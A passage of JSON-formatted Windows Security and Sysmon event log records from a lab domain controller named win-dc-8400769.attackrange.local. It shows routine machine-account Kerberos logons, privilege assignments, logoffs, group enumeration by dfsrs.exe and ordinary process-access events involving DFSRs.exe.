cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x65497","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{84587115-398E-4BE5-5705-9593D4B595D1}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"fe80::bd2f:79cc:df6c:109f","IpPort":"52630","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:54:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220416,"ProcessID":864,"ThreadID":2212,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x655F5\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x655f5","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 06:54:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220417,"ProcessID":864,"ThreadID":2212,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x655F5\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{84587115-398E-4BE5-5705-9593D4B595D1}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\tfe80::bd2f:79cc:df6c:109f\r\n\tSource Port:\t\t52631\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x655f5","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{84587115-398E-4BE5-5705-9593D4B595D1}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"fe80::bd2f:79cc:df6c:109f","IpPort":"52631","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:54:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220418,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x655F5\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x655f5","LogonType":"3","EventReceivedTime":"2020-08-01 06:54:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4799,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":13826,"OpcodeValue":0,"RecordNumber":220419,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"A security-enabled local group membership was enumerated.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E7\r\n\r\nGroup:\r\n\tSecurity ID:\t\tS-1-5-32-544\r\n\tGroup Name:\t\tAdministrators\r\n\tGroup Domain:\t\tBuiltin\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0xb64\r\n\tProcess Name:\t\tC:\\Windows\\System32\\dfsrs.exe","Category":"Security Group Management","Opcode":"Info","TargetUserName":"Administrators","TargetDomainName":"Builtin","TargetSid":"S-1-5-32-544","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e7","CallerProcessId":"0xb64","CallerProcessName":"C:\\Windows\\System32\\dfsrs.exe","EventReceivedTime":"2020-08-01 06:54:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4631,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:29.389\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 988\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001094C70200}\r\nTargetProcessId: 2916\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1fb7a|C:\\Windows\\SYSTEM32\\samsrv.dll+5df1|C:\\Windows\\SYSTEM32\\samsrv.dll+5cf2|C:\\Windows\\SYSTEM32\\samsrv.dll+184ee|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:29.389","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"988","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001094C70200}","TargetProcessId":"2916","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1fb7a|C:\\Windows\\SYSTEM32\\samsrv.dll+5df1|C:\\Windows\\SYSTEM32\\samsrv.dll+5cf2|C:\\Windows\\SYSTEM32\\samsrv.dll+184ee|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4799,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":13826,"OpcodeValue":0,"RecordNumber":220420,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"A security-enabled local group membership was enumerated.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E7\r\n\r\nGroup:\r\n\tSecurity ID:\t\tS-1-5-32-551\r\n\tGroup Name:\t\tBackup Operators\r\n\tGroup Domain:\t\tBuiltin\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0xb64\r\n\tProcess Name:\t\tC:\\Windows\\System32\\dfsrs.exe","Category":"Security Group Management","Opcode":"Info","TargetUserName":"Backup Operators","TargetDomainName":"Builtin","TargetSid":"S-1-5-32-551","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e7","CallerProcessId":"0xb64","CallerProcessName":"C:\\Windows\\System32\\dfsrs.exe","EventReceivedTime":"2020-08-01 06:54:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4632,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:29.389\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001094C70200}\r\nTargetProcessId: 2916\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1fb7a|C:\\Windows\\SYSTEM32\\samsrv.dll+5df1|C:\\Windows\\SYSTEM32\\samsrv.dll+5cf2|C:\\Windows\\SYSTEM32\\samsrv.dll+184ee|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:29.389","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001094C70200}","TargetProcessId":"2916","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1fb7a|C:\\Windows\\SYSTEM32\\samsrv.dll+5df1|C:\\Windows\\SYSTEM32\\samsrv.dll+5cf2|C:\\Windows\\SYSTEM32\\samsrv.dll+184ee|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4633,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:54:29.404\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-001015C40000}\r\nSourceProcessId: 1196\r\nSourceThreadId: 1384\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001094C70200}\r\nTargetProcessId: 2916\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x100000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|c:\\windows\\system32\\es.dll+118e5|c:\\windows\\system32\\es.dll+13b72|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:54:29.404","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-001015C40000}","SourceProcessId":"1196","SourceThreadId":"1384","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001094C70200}","TargetProcessId":"2916","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x100000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|c:\\windows\\system32\\es.dll+118e5|c:\\windows\\system32\\es.dll+13b72|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be","EventReceivedTime":"2020-08-01 06:54:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220421,"ProcessID":864,"ThreadID":2212,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6576B\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x6576b","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege\r\n\t\t\tSeEnableDelegationPrivilege","EventReceivedTime":"2020-08-01 06:54:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220422,"ProcessID":864,"ThreadID":2212,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon ID:\t\t0x6576B\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{84587115-398E-4BE5-5705-9593D4B595D1}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\tfe80::bd2f:79cc:df6c:109f\r\n\tSource Port:\t\t52633\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tKerberos\r\n\tAuthentication Package:\tKerberos\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE.LOCAL","TargetLogonId":"0x6576b","LogonType":"3","LogonProcessName":"Kerberos","AuthenticationPackageName":"Kerberos","WorkstationName":"-","LogonGuid":"{84587115-398E-4BE5-5705-9593D4B595D1}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"-","IpAddress":"fe80::bd2f:79cc:df6c:109f","IpPort":"52633","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:54:30","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:54:29","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220423,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x6576B\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-18","TargetUserName":"WIN-DC-8400769$","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x6576b","LogonType":"3","EventReceivedTime":"2020-08-01 